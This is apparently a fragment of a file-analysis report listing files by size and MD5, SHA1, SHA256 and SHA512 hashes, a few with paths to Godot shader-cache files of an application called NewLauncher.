SHA256fcea95cc39dc6c2a925f5aed739dbedaa405ee4ce127f535fcf1c751b2b8fb5d
SHA512dc97034546a4c94bdaa6f644b5cfd1e477209de9a03a5b02a360c254a406c1d647d6f90860f385e27387b35631c41f0886cb543ede9116436941b9af6cd3285d
-
Filesize
5KB
MD57820d3199b4765c4abbd7b52c80c03c6
SHA1ac7882eaa4cb78d95e0f4981a0eb4452e99083d2
SHA256e75499f1324221ac6c8a042d012d90fe61106deffa814667eabc996283a4bd0a
SHA51261f433c2bc9b15bf383964f5e6a832110e449fc32c1093acf0eeae917e8e8242175d054d1f694251af57b47fc93cc7190cc8ce93ad4b25c38395b68ad339a91e
-
Filesize
6KB
MD58b3cc0bf6bf524550194b4956b4c54fb
SHA115b42278006c20ca269c16191b8b5f6ac407dfbb
SHA25686bd8acffbd6e03a7f0c98f5beb59d84b296c7f0ad5cee13b5456929a8501de2
SHA512a2be1a160ab463aaad006c35fef4b8d0b13b985fd5cd2dfded032d6e55c4f4e75f0dd9eff54513422aca6299e11d70a00e9c1d0da3196b15f43843796633de03
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD54656de458fc7a90b06d00ab644cfcd61
SHA1a1151384fcdec2f13d3fb18485050f4cf57efab2
SHA256069bd245cd981ef948091150ab043a1614b150f4b80bd0250dec0f2d35952226
SHA512e1205ff94853cca7a518236fa99602a645fe948ba02c2ca83d05a4bf76e56825cc8e63e96463fe32aa71bffff3488642fba1d3dcf401c69da6d43923f2512cb9
-
Filesize
11KB
MD56cd0b0ae487b84bad5b1e5af42cbe361
SHA12f944de581c4684d2af40b76ab9dc4f8b8489c1e
SHA2563319e4432bba65254d74cbdee6b2e6af1abe518a0abaa3d3130f0ff2a3b1aa11
SHA5124489e2d5007ee1f249bfc4f7cd21d491b8cca38e82cd6a35865c3f4b60085b22d38e8bb56e70a8b1f6863b38fde68f0bc8544f05633adf28f62d3b529f2dff6a
-
Filesize
12KB
MD5dabd9a1380a3ad23bde1ef98db238bea
SHA1f191016b95d9ee29cc6d93144f6b509d442aa35c
SHA256fbeec561eb7745da7c88fcc1fa452ee3ae1657d627d21da8efb5c3dae109a811
SHA51294b4a754feb8abf710fb614a3b409932a5149cbf6a2e8534428887957ce4861ad9144f9d03f4886b23e6767693c2e98c3660458e5ac6ae9a5526c3ea03da7891
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
944B
MD596ff1ee586a153b4e7ce8661cabc0442
SHA1140d4ff1840cb40601489f3826954386af612136
SHA2560673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA5123404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569
-
Filesize
1KB
MD5e4927f1bb6d2e21dd9edd0d0a03d6a78
SHA15e059a065a455ddc2ade77393ee1d8a6c32a6654
SHA2561846a6d84d5053383549ad2176b534b2c0b217c5e6ed5e5a3c94cc5cda40b841
SHA51219cc6e6569e0c392460b0d02ba54e7e4227b681d126c4e749be0822409dfc506890737834f0ad6b741c5c4fc2b447d983c43d658ec9960694d60c3ceffa32d48
-
Filesize
1KB
MD52419d068e09423d5e7edec9bb8010870
SHA1445b4a6ebefa37ee91ff5a18a3b8e6ae6af40fba
SHA256d308e6cb382517e03b6773d345b2e68e57fe80ce636901ab95da87ba29d6c0ac
SHA512053cb92ad73f842f22200dd39082a22474277816b1de63a722b881225218849e1d5038fe3caec8f2067c5e6ab593917d1ad7278038c154077e7e2b14d72f3264
-
Filesize
944B
MD5692a440f9cfbeaf648632aead685a5a1
SHA1e4e4bd8405be77294f4be5ea18b5e05b139f35af
SHA2563e1615e7774bd98860c984570515c293b64cf07f1b8e6688a72e78fa9ebed0f4
SHA512c7501a0fc978d0f06f32c4a205246763796a20c0b2514f00cb6676c8c95ab38d463b87c2973ca2b9b3e2fee3bc7ded869f5896c498303397167c4b5f069db519
-
Filesize
944B
MD5ef72c47dbfaae0b9b0d09f22ad4afe20
SHA15357f66ba69b89440b99d4273b74221670129338
SHA256692ec20c7039170fb199510f0436181fd155e6b4516d4d1c9e1675adf99aaa7f
SHA5127514b6bc8dc39fa618223300be27cd535dc35b18c66b4a089e2302e72b3e0cac06d88a989fa1296feb386b3cbe2084019df6430c7f895071b76e04ce559a30b4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
72B
MD558a292d79ff3903bea2f12bbef742979
SHA100f6d948204336c6c6e1f050e2a0c39122944b9a
SHA2560b87558f1828175add70422ec56c9ed384e27515596950808d519bfafcab4bc1
SHA512d40c91f07520e96a44d5080d086a6818e1a102d9c825abd637e9da8eee6cb757523dfe68880027ab1befd1f509592ee939e999be2bee2a2523b82387afbf5896
-
C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\shader_cache\CanvasShaderGLES3\4e9e83ef92cfe6b6881057f0e41e775d2f0a3ea470fb34af487edaa273c90c2c\fa7b62523470356194bdf709eb2639ab149a07cc.cache
Filesize128KB
MD531493e258a21680bcb8e57ae1db77eaa
SHA1bdef2bb9c4d5118bf65206e2109ba9af47a7c2bb
SHA256f9807566566182192ee7f47955d9e2cde5aecda8380e4923c860afe75ac82127
SHA5120254415318c4e90fb5c88b900939ce546be2964860be6fe117cd8c3ca8d53379dd21f512cf3aa8d5027debb61685cd6739b63dc1f52b6e0e862f2c1cdac921fa
-
C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\shader_cache\CopyShaderGLES3\f8827df5e23db5bc636a3d6c081f1b5ec27655db61c9d942fd9b2364a6b58de7\fa7b62523470356194bdf709eb2639ab149a07cc.cache
Filesize60KB
MD5b5e157aabf1ad8173f58afc808372572
SHA1686897130946b9fc563fcbaf43ecf4ddff130648
SHA256808932f74dbcf687842cbfa4428b80d2f9fe51a9ce4f829700f5e104f1245393
SHA5124c199408bb17cd31b9ee9945cb1ace5ab6898bf0f9ada2f903867a96736097def1c1bcdf030b7d5f7545ab0086bf70e0fb61de9df727e180704322b73cd3727e
-
C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\shader_cache\SceneShaderGLES3\fde6c2cbcc2ec71d9bf0aaa797b35a71635bb92f1057da48e6e13d5058805d9c\fa7b62523470356194bdf709eb2639ab149a07cc.cache
Filesize343KB
MD5858c90cf6f469533fa56359a33e91580
SHA197811818c89d34fe907bac6f49690b88b4d43a66
SHA2560ec2129e8e633e289ec86ea0ebe1537067cb3f153aa13a58aaadfec1f9c1a9a5
SHA5121cb99b324a4b4ee389afa8ca5428a49c03ed73159509697d5e380763f40e1abece7a130aff7e8e486316c69ffca6e00d6c5184957a9e12d916dca26394f71c53
-
Filesize
437KB
MD5106fe1980dbcb4fa2fe0c00b6d6fa7c2
SHA15cb7eb7be8f3d1641cb458024d868363658a2955
SHA256c0716389100b55b09f46fafef37bb7d120453df3bfb1097dcd30e14bb97c09bc
SHA512c9d48c5f5ecf83012f1cc16581b7bb283265a3808847af46195987c7b0721116fe7241185d67b5d7636080881da5f18df04e57e309ff5a133046dd87ca8d06ce
-
Filesize
17.8MB
MD55bc010a93fc0c8c9cff8cfd75d4d3789
SHA1ccd129aa5a074d6308d1fa2fb287a3710a8c55f3
SHA2562e16953cd6445d754b38f654a83ba81d7f34598b23882ca14f40f1ef88e64242
SHA512a3e0481cb2316be56cfbde123b2087d01e3ade7f9e2f04b50c14bb2930a7d56620b47fa106cd92d5b4cd5fea412c668dab0dfb6f4986c564ab988a231373bd0a